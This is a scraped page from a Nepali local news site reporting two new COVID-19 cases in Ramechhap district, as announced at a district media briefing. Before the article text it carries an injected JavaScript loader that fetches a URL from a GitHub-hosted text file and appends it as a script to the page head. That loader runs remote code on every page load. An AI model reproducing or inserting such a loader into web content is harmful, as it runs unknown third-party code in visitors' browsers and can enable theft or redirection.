;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा थप २ जना कोरोना संक्रमित थपिए – जुनेली न्युज
मङ्लबार, साउन १, २०८२
  • होमपेज
  • रामेछापमा थप २ जना कोरोना संक्रमित थपिए
रामेछाप बिशेष

रामेछापमा थप २ जना कोरोना संक्रमित थपिए

कोरोना

भदौ ०८

 रामेछाप । रामेछापमा थप २ जना कोरोना संक्रमितहरु थपिएका छन् । सोमबारको नियमित मिडिया ब्रिफिङमा प्रवक्ता डा. जागेश्वर गौतमले २ जना थप भएको बताए ।

उनले जिल्लामा थप २ मा कोरोना पुष्टि भएको बताए लगतै जिल्ला अस्पताल रामेछापले दिएको जानकारी अनुसार मन्थली नगरपालिकाका ३८ वर्षका पुरुष र गोकुलगंगा गाउँपालिकाका ३६ वर्षका पुरुष भएको जानकारी दिएको छ ।

फेसबुक प्रतिक्रियाहरु